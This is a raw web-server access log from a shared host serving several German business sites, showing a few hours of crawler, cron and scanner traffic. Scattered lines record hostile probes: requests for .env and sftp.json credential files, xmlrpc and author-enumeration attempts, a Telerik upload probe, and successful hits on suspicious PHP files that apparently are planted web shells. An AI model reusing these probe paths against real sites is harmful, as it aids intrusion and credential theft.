81.169.178.0 - - [08/Nov/2023:03:24:33 +0100] "POST /wp-cron.php?doing_wp_cron=1699410273.2165229320526123046875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699410273.2165229320526123046875" "WordPress/5.8.8; https://www.ipcbusiness.de"
114.119.144.0 - - [08/Nov/2023:03:24:33 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.149.0 - - [08/Nov/2023:03:24:37 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.169.178.0 - - [08/Nov/2023:03:25:27 +0100] "POST /wp-cron.php?doing_wp_cron=1699410327.1967139244079589843750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699410327.1967139244079589843750" "WordPress/5.2.19; https://www.computerdoc24.de"
104.244.78.0 - - [08/Nov/2023:03:25:27 +0100] "GET /wp-login.php HTTP/1.1" 200 2148 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:03:26:19 +0100] "POST /wp-cron.php?doing_wp_cron=1699410379.8337950706481933593750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699410379.8337950706481933593750" "WordPress/5.2.19; https://www.computerdoc24.de"
104.244.78.0 - - [08/Nov/2023:03:26:19 +0100] "GET //wp-content/plugins/WordPressCore/include.php HTTP/1.1" 200 - "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
104.244.78.0 - - [08/Nov/2023:03:26:20 +0100] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 200 11026 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:03:26:41 +0100] "POST /wp-cron.php?doing_wp_cron=1699410401.1720259189605712890625 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699410401.1720259189605712890625" "WordPress/5.2.19; https://www.computerdoc24.de"
104.244.78.0 - - [08/Nov/2023:03:26:41 +0100] "GET /?author=1 HTTP/1.1" 404 10584 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
162.216.150.0 - - [08/Nov/2023:03:28:57 +0100] "GET / HTTP/1.1" 403 2409 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
85.25.185.0 - - [08/Nov/2023:03:29:48 +0100] "GET /robots.txt HTTP/1.1" 404 2607 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
85.25.185.0 - - [08/Nov/2023:03:29:48 +0100] "GET /html/impressum.html HTTP/1.1" 200 3769 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
184.105.139.0 - - [08/Nov/2023:03:37:32 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
114.119.157.0 - - [08/Nov/2023:03:39:14 +0100] "GET /robots.txt HTTP/1.1" 404 2611 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
184.105.139.0 - - [08/Nov/2023:03:41:16 +0100] "GET /geoserver/web/ HTTP/1.1" 404 2559 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
47.96.254.0 - - [08/Nov/2023:03:49:15 +0100] "GET /wp-content/uploads/20210720_130140_HDR-1024x768.jpg HTTP/1.1" 200 71123 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
62.122.184.0 - - [08/Nov/2023:03:52:17 +0100] "GET / HTTP/1.0" 200 16151 "http://reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
62.122.184.0 - - [08/Nov/2023:03:52:17 +0100] "GET /html/kontakt.html HTTP/1.0" 200 11221 "http://reinigungsprofi-weck.de/html/kontakt.html" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
178.254.29.0 - - [08/Nov/2023:03:57:46 +0100] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
178.254.29.0 - - [08/Nov/2023:03:57:46 +0100] "GET / HTTP/1.1" 200 16118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
81.169.178.0 - - [08/Nov/2023:03:57:47 +0100] "POST /wp-cron.php?doing_wp_cron=1699412266.9700930118560791015625 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699412266.9700930118560791015625" "WordPress/5.8.8; https://www.ipcbusiness.de"
81.169.178.0 - - [08/Nov/2023:03:59:38 +0100] "POST /wp-cron.php?doing_wp_cron=1699412378.2237489223480224609375 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699412378.2237489223480224609375" "WordPress/5.2.19; https://www.computerdoc24.de"
135.181.95.0 - - [08/Nov/2023:03:59:38 +0100] "GET /product-category/aktuelle-angebote/ HTTP/1.1" 200 13464 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
213.180.203.0 - - [08/Nov/2023:04:00:42 +0100] "GET /robots.txt HTTP/1.1" 301 295 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.231.0 - - [08/Nov/2023:04:00:42 +0100] "GET /pl/ueber-uns/auftraggeber/ HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
81.169.178.0 - - [08/Nov/2023:04:01:17 +0100] "POST /wp-cron.php?doing_wp_cron=1699412477.4469349384307861328125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699412477.4469349384307861328125" "WordPress/5.2.19; https://www.computerdoc24.de"
164.132.112.0 - - [08/Nov/2023:04:01:17 +0100] "POST /xmlrpc.php HTTP/1.1" 503 7312 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
82.165.86.0 - - [08/Nov/2023:04:06:00 +0100] "GET /simple.php HTTP/1.1" 301 241 "http://simplesite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
81.169.178.0 - - [08/Nov/2023:04:06:00 +0100] "POST /wp-cron.php?doing_wp_cron=1699412760.4924039840698242187500 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699412760.4924039840698242187500" "WordPress/5.8.8; https://www.ipcbusiness.de"
82.165.86.0 - - [08/Nov/2023:04:06:00 +0100] "GET /simple.php HTTP/1.1" 200 - "http://ipcbusiness.de/simple.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
82.165.86.0 - - [08/Nov/2023:04:06:00 +0100] "GET /simple.php HTTP/1.1" 200 40940 "https://ipcbusiness.de/simple.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
34.38.51.0 - - [08/Nov/2023:04:06:12 +0100] "GET /robots.txt HTTP/1.1" 404 2607 "-" "DnBCrawler-Analytics"
34.38.51.0 - - [08/Nov/2023:04:06:12 +0100] "GET / HTTP/1.1" 200 2590 "-" "DnBCrawler-Analytics"
82.165.86.0 - - [08/Nov/2023:04:06:13 +0100] "GET /simple.php HTTP/1.1" 301 241 "http://simplesite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
34.38.51.0 - - [08/Nov/2023:04:06:13 +0100] "GET /html/kontakt.html HTTP/1.1" 200 2033 "-" "DnBCrawler-Analytics"
82.165.86.0 - - [08/Nov/2023:04:06:13 +0100] "GET /simple.php HTTP/1.1" 200 - "http://ipcbusiness.de/simple.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
34.38.51.0 - - [08/Nov/2023:04:06:13 +0100] "GET /html/impressum.html HTTP/1.1" 200 3769 "-" "DnBCrawler-Analytics"
82.165.86.0 - - [08/Nov/2023:04:06:13 +0100] "GET /simple.php HTTP/1.1" 200 40940 "https://ipcbusiness.de/simple.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
34.38.51.0 - - [08/Nov/2023:04:06:13 +0100] "GET /html/anfahrtskosten.html HTTP/1.1" 200 2353 "-" "DnBCrawler-Analytics"
34.38.51.0 - - [08/Nov/2023:04:06:13 +0100] "GET /html/vorher_nachher.html HTTP/1.1" 200 2132 "-" "DnBCrawler-Analytics"
34.38.51.0 - - [08/Nov/2023:04:06:14 +0100] "GET /index.html HTTP/1.1" 200 2590 "-" "DnBCrawler-Analytics"
34.38.51.0 - - [08/Nov/2023:04:06:14 +0100] "GET /html/referenzen.html HTTP/1.1" 200 2727 "-" "DnBCrawler-Analytics"
193.118.53.0 - - [08/Nov/2023:04:15:42 +0100] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.94.146.0 - - [08/Nov/2023:04:16:54 +0100] "GET / HTTP/1.1" 403 2411 "-" "-"
167.94.146.0 - - [08/Nov/2023:04:16:54 +0100] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.0 - - [08/Nov/2023:04:16:54 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
192.155.90.0 - - [08/Nov/2023:04:18:12 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.61.0 - - [08/Nov/2023:04:23:14 +0100] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
3.253.199.0 - - [08/Nov/2023:04:23:43 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
3.253.199.0 - - [08/Nov/2023:04:23:46 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:04:25:00 +0100] "POST /wp-cron.php?doing_wp_cron=1699413900.7012729644775390625000 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699413900.7012729644775390625000" "WordPress/5.8.8; https://www.ipcbusiness.de/en"
165.227.114.0 - - [08/Nov/2023:04:25:00 +0100] "GET /en/unsere-produkte-und-services/innovative-ladeeinheiten/ HTTP/1.1" 200 11078 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
199.244.88.0 - - [08/Nov/2023:04:25:16 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
66.249.64.0 - - [08/Nov/2023:04:27:57 +0100] "GET /robots.txt HTTP/1.1" 404 2607 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.0 - - [08/Nov/2023:04:27:57 +0100] "GET / HTTP/1.1" 200 2590 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.0 - - [08/Nov/2023:04:28:16 +0100] "GET /assets/rollover.js HTTP/1.1" 200 5145 "http://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.117 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.99.0.0 - - [08/Nov/2023:04:29:35 +0100] "GET /.env HTTP/1.1" 404 2539 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.99.0.0 - - [08/Nov/2023:04:29:36 +0100] "POST / HTTP/1.1" 404 2531 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.99.0.0 - - [08/Nov/2023:04:29:37 +0100] "GET /.env HTTP/1.1" 404 2543 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.99.0.0 - - [08/Nov/2023:04:29:39 +0100] "POST / HTTP/1.1" 404 2535 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:04:30:23 +0100] "POST /wp-cron.php?doing_wp_cron=1699414222.9259779453277587890625 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699414222.9259779453277587890625" "WordPress/5.2.19; https://www.computerdoc24.de"
114.119.145.0 - - [08/Nov/2023:04:30:22 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
5.196.77.0 - - [08/Nov/2023:04:32:50 +0100] "GET /index.php?pd=smyedit&mapname=sitemap.php&dstr=asd HTTP/1.1" 403 17004 "computerdoc24.de" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36"
200.53.28.0 - - [08/Nov/2023:04:35:52 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
35.233.62.0 - - [08/Nov/2023:04:35:55 +0100] "GET / HTTP/1.1" 403 2411 "-" "python-requests/2.31.0"
85.25.185.0 - - [08/Nov/2023:04:38:25 +0100] "GET /robots.txt HTTP/1.1" 404 2607 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
85.25.185.0 - - [08/Nov/2023:04:38:25 +0100] "GET /sitemap.xml HTTP/1.1" 404 2609 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
65.108.46.0 - - [08/Nov/2023:04:49:00 +0100] "GET /robots.txt HTTP/1.1" 200 67 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
81.169.178.0 - - [08/Nov/2023:04:49:00 +0100] "POST /?wordfence_syncAttackData=1699415340.4009 HTTP/1.1" 200 - "https://www.computerdoc24.de/?wordfence_syncAttackData=1699415340.4009" "WordPress/5.2.19; https://www.computerdoc24.de"
65.108.46.0 - - [08/Nov/2023:04:49:03 +0100] "GET /product/ibm-thinkpad-mit-neuer-240gb-ssd/feed/ HTTP/1.1" 200 447 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:05 +0100] "GET /product/leistungsstarkes-17-zoll-hp-notebook/feed/ HTTP/1.1" 200 449 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:07 +0100] "GET /product/office-internet-pc-fujitsu-marken-pc-4gb-240gb-ssd-neu/feed/ HTTP/1.1" 200 461 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
81.169.178.0 - - [08/Nov/2023:04:49:00 +0100] "POST /wp-cron.php?doing_wp_cron=1699415340.5800600051879882812500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699415340.5800600051879882812500" "WordPress/5.2.19; https://www.computerdoc24.de"
65.108.46.0 - - [08/Nov/2023:04:49:09 +0100] "GET /product/office-internet-pc-fujitsu-marken-pc/feed/ HTTP/1.1" 200 448 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:11 +0100] "GET /product/office-und-internet-pc/feed/ HTTP/1.1" 200 438 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:13 +0100] "GET /product/schicker-173-zoll-hp-mit-250gb-ssd-kopie/feed/ HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:15 +0100] "GET /product/schneller-office-pc-mit-16gb-ram/feed/ HTTP/1.1" 200 446 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:17 +0100] "GET /product/schneller-spiele-und-arbeits-pc/feed/ HTTP/1.1" 200 445 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:19 +0100] "GET /product/schoenes-asus-a53s-notebook/feed/ HTTP/1.1" 200 443 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:21 +0100] "GET /product/schoenes-lenove-idea-pad-100s-linux/feed/ HTTP/1.1" 200 447 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:23 +0100] "GET /product/sehr-schneller-arbeits-pc-gaming/feed/ HTTP/1.1" 200 445 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.46.0 - - [08/Nov/2023:04:49:25 +0100] "GET /product/zocker-pc/feed/ HTTP/1.1" 200 431 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
41.216.188.0 - - [08/Nov/2023:04:56:04 +0100] "GET /wp-content/themes/include.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
41.216.188.0 - - [08/Nov/2023:04:56:06 +0100] "GET /wp-content/themes/include.php HTTP/1.1" 200 6627 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
41.216.188.0 - - [08/Nov/2023:04:56:12 +0100] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
41.216.188.0 - - [08/Nov/2023:04:56:15 +0100] "GET /wp-includes/widgets/include.php HTTP/1.1" 200 6628 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
81.169.178.0 - - [08/Nov/2023:05:01:04 +0100] "POST /wp-cron.php?doing_wp_cron=1699416064.4935278892517089843750 HTTP/1.1" 200 - "http://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699416064.4935278892517089843750" "WordPress/5.2.19; https://www.computerdoc24.de"
35.195.212.0 - - [08/Nov/2023:05:01:04 +0100] "GET /robots.txt HTTP/1.1" 200 - "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:05 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:06 +0100] "GET / HTTP/1.1" 301 - "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:06 +0100] "GET / HTTP/1.1" 200 18932 "-" "DnBCrawler-Analytics"
172.104.12.0 - - [08/Nov/2023:05:01:08 +0100] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 2609 "-" "-"
35.195.212.0 - - [08/Nov/2023:05:01:09 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:10 +0100] "GET /kontakt/ HTTP/1.1" 200 12650 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:11 +0100] "GET /impressum/ HTTP/1.1" 200 12780 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:13 +0100] "GET /datenschutzerklaerung/ HTTP/1.1" 200 22864 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:15 +0100] "GET /allgemeine-geschaeftsbedingungen/ HTTP/1.1" 200 12740 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:17 +0100] "GET /aktuelle-angebote/ HTTP/1.1" 200 11920 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:19 +0100] "GET /service/ HTTP/1.1" 200 14353 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:21 +0100] "GET /fernwartung/ HTTP/1.1" 200 10930 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:23 +0100] "GET /software/ HTTP/1.1" 200 10332 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:24 +0100] "GET /pc-ankauf/ HTTP/1.1" 200 12252 "-" "DnBCrawler-Analytics"
35.195.212.0 - - [08/Nov/2023:05:01:25 +0100] "GET /presse/ HTTP/1.1" 200 11848 "-" "DnBCrawler-Analytics"
35.201.9.0 - - [08/Nov/2023:05:05:22 +0100] "GET /index.php?of=1&a=1 HTTP/1.1" 301 253 "ipcbusiness.de" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36"
35.201.9.0 - - [08/Nov/2023:05:05:23 +0100] "GET /index.php?of=1&a=1 HTTP/1.1" 403 17004 "ipcbusiness.de" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:05:09:35 +0100] "POST /wp-cron.php?doing_wp_cron=1699416574.9408230781555175781250 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699416574.9408230781555175781250" "WordPress/5.2.19; https://www.computerdoc24.de"
188.85.81.0 - - [08/Nov/2023:05:09:34 +0100] "POST /xmlrpc.php HTTP/1.1" 503 7312 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
70.35.195.0 - - [08/Nov/2023:05:10:30 +0100] "GET /.vscode/sftp.json HTTP/1.1" 404 2565 "-" "-"
87.98.134.0 - - [08/Nov/2023:05:11:02 +0100] "GET /inputs.php HTTP/1.1" 301 241 "ipcbusiness.de" "Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37"
81.169.178.0 - - [08/Nov/2023:05:11:02 +0100] "POST /?wordfence_syncAttackData=1699416662.6788 HTTP/1.1" 200 - "https://www.ipcbusiness.de/?wordfence_syncAttackData=1699416662.6788" "WordPress/5.8.8; https://www.ipcbusiness.de"
81.169.178.0 - - [08/Nov/2023:05:11:03 +0100] "GET / HTTP/1.1" 200 16118 "https://www.ipcbusiness.de/" "WordPress/5.8.8; https://www.ipcbusiness.de"
81.169.178.0 - - [08/Nov/2023:05:11:03 +0100] "POST /wp-cron.php?doing_wp_cron=1699416663.1022150516510009765625 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699416663.1022150516510009765625" "WordPress/5.8.8; https://www.ipcbusiness.de"
87.98.134.0 - - [08/Nov/2023:05:11:02 +0100] "GET /inputs.php HTTP/1.1" 200 - "ipcbusiness.de" "Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37"
87.98.134.0 - - [08/Nov/2023:05:11:03 +0100] "GET /inputs.php HTTP/1.1" 200 40940 "ipcbusiness.de" "Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37"
198.235.24.0 - - [08/Nov/2023:05:14:45 +0100] "GET / HTTP/1.1" 200 2691 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.196.220.0 - - [08/Nov/2023:05:15:01 +0100] "GET /wp-content/plugins/another-wordpress-classifieds-plugin/README.TXT HTTP/1.1" 200 9972 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:05:20:23 +0100] "POST /wp-admin/admin-ajax.php?action=wp_1_wc_privacy_cleanup&nonce=00aac83967 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-admin/admin-ajax.php?action=wp_1_wc_privacy_cleanup&nonce=00aac83967" "WordPress/5.2.19; https://www.computerdoc24.de"
81.169.178.0 - - [08/Nov/2023:05:20:22 +0100] "POST /wp-cron.php?doing_wp_cron=1699417222.6708590984344482421875 HTTP/1.1" 200 - "http://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699417222.6708590984344482421875" "WordPress/5.2.19; https://www.computerdoc24.de"
89.246.112.0 - - [08/Nov/2023:05:20:22 +0100] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.169.178.0 - - [08/Nov/2023:05:20:24 +0100] "POST /wp-cron.php?doing_wp_cron=1699417224.6043679714202880859375 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699417224.6043679714202880859375" "WordPress/5.2.19; https://www.computerdoc24.de"
89.246.112.0 - - [08/Nov/2023:05:20:24 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.246.112.0 - - [08/Nov/2023:05:20:25 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
89.246.112.0 - - [08/Nov/2023:05:20:26 +0100] "GET / HTTP/1.1" 200 95739 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
89.246.112.0 - - [08/Nov/2023:05:20:27 +0100] "HEAD /impressum/ HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.246.112.0 - - [08/Nov/2023:05:20:28 +0100] "GET /impressum/ HTTP/1.1" 200 57834 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
